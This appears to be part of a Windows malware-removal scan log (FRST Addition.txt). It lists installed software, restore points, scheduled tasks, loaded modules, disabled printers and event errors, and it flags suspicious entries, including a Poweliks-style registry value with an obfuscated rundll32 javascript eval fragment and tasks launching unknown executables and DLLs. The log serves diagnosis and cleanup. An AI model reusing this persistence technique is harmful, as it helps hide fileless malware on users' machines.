Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)
Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)
Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)
Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)
Destination Component (Version: 110.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) Hidden
DocMgr (Version: 120.0.000.000 - Hewlett-Packard) Hidden
DocProc (Version: 12.0.0.0 - Hewlett-Packard) Hidden
EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
Fax (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Feedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)
Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)
GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)
HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)
HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)
HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)
HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)
HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)
HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HPSSupply (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)
iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)
iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)
Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) Hidden
MediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)
Network (Version: 120.0.194.000 - Hewlett-Packard) Hidden
OCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)
PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)
ProductContext (Version: 50.0.165.000 - Hewlett-Packard) Hidden
QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )
Roxio Creator Audio (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Copy (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Data (Version: 3.7.0 - Roxio) Hidden
Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)
Roxio Creator DE (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Tools (Version: 3.7.0 - Roxio) Hidden
Roxio Express Labeler 3 (Version: 3.2.1 - Roxio) Hidden
Roxio Update Manager (Version: 6.0.0 - Roxio) Hidden
SAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)
SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)
SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) Hidden
Scan (Version: 12.0.0.0 - Hewlett-Packard) Hidden
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)
Skins (Version: 2007.0731.2234.38497 - ATI) Hidden
SmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) Hidden
SolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
Status (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Toolbox (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Transporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)
TrayApp (Version: 120.0.194.000 - Hewlett-Packard) Hidden
UnloadSupport (Version: 11.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version:  - Microsoft)
Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version:  - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)
WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
29-07-2014 11:25:23 Scheduled Checkpoint
30-07-2014 11:45:57 Scheduled Checkpoint
01-08-2014 21:10:36 Scheduled Checkpoint
02-08-2014 16:42:56 Scheduled Checkpoint
04-08-2014 04:00:03 Scheduled Checkpoint
07-08-2014 22:48:19 Scheduled Checkpoint
11-08-2014 02:11:41 Scheduled Checkpoint
11-08-2014 15:01:42 Scheduled Checkpoint
12-08-2014 10:45:08 Scheduled Checkpoint
14-08-2014 02:36:25 Scheduled Checkpoint
14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14  17:59
14-08-2014 23:31:34 Advanced-System Protector
15-08-2014 23:47:04 Removed SofTest
16-08-2014 13:18:06 Removed DriverUpdate
16-08-2014 13:29:10 Removed HTC Sync.
16-08-2014 13:44:46 Removed HTC Sync.
16-08-2014 14:02:17 Removed HTC BMP USB Driver.
16-08-2014 16:47:50 Advanced-System Protector
16-08-2014 21:58:06 Installed AVG 2014
16-08-2014 22:11:41 Removed SlimCleaner Plus
16-08-2014 22:14:50 Removed HTC Driver Installer.
17-08-2014 19:56:09 Installed AVG 2014
17-08-2014 19:59:04 Installed AVG 2014
17-08-2014 20:03:04 Removed AVG 2014
17-08-2014 20:04:51 Installed AVG 2011
17-08-2014 21:08:16 Installed AVG 2014
17-08-2014 21:16:20 Installed AVG 2014
17-08-2014 21:24:43 Removed AVG 2014
17-08-2014 21:26:10 Installed AVG 2011
19-08-2014 21:04:48 Advanced-System Protector
21-08-2014 01:40:12 Advanced-System Protector
23-08-2014 20:47:11 Checkpoint by HitmanPro
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-08-23 14:19 - 2014-08-24 15:40 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)
Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTION
Task: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exe
Task: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exe
Task: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)
Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)
Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServer
Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe
Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exe
Task: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)
Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION
Task: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)
Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)
Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll"
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll
2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll
2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll
2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll
2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll
2012-05-16 21:52 - 2011-01-04 15:34 - 04545024 _____ () C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
2012-05-16 21:52 - 2009-08-28 16:50 - 00282624 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvcLib.dll
2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll
2014-08-23 17:21 - 2014-08-23 17:21 - 08537928 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\pdf.dll
2014-08-23 17:21 - 2014-08-23 17:21 - 00353096 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ppGoogleNaClPluginChrome.dll
2014-08-23 17:21 - 2014-08-23 17:21 - 01732936 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
==================== Faulty Device Manager Devices =============
 
Name: Microsoft 6to4 Adapter #2
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet 1022n
Description: HP LaserJet 1022n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Deskjet 6940 series
Description: Deskjet 6940 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: hp LaserJet 2420
Description: hp LaserJet 2420
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Deskjet 6980 series
Description: Deskjet 6980 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Deskjet 6980 series
Description: Deskjet 6980 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet P2035n
Description: HP LaserJet P2035n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet CP1025nw
Description: HP LaserJet CP1025nw
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP Color LaserJet CP2025dn
Description: HP Color LaserJet CP2025dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet P2035n
Description: HP LaserJet P2035n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet 200 color M251nw
Description: HP LaserJet 200 color M251nw
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP Color LaserJet CP2025dn
Description: HP Color LaserJet CP2025dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\FIL\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\48.PNG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
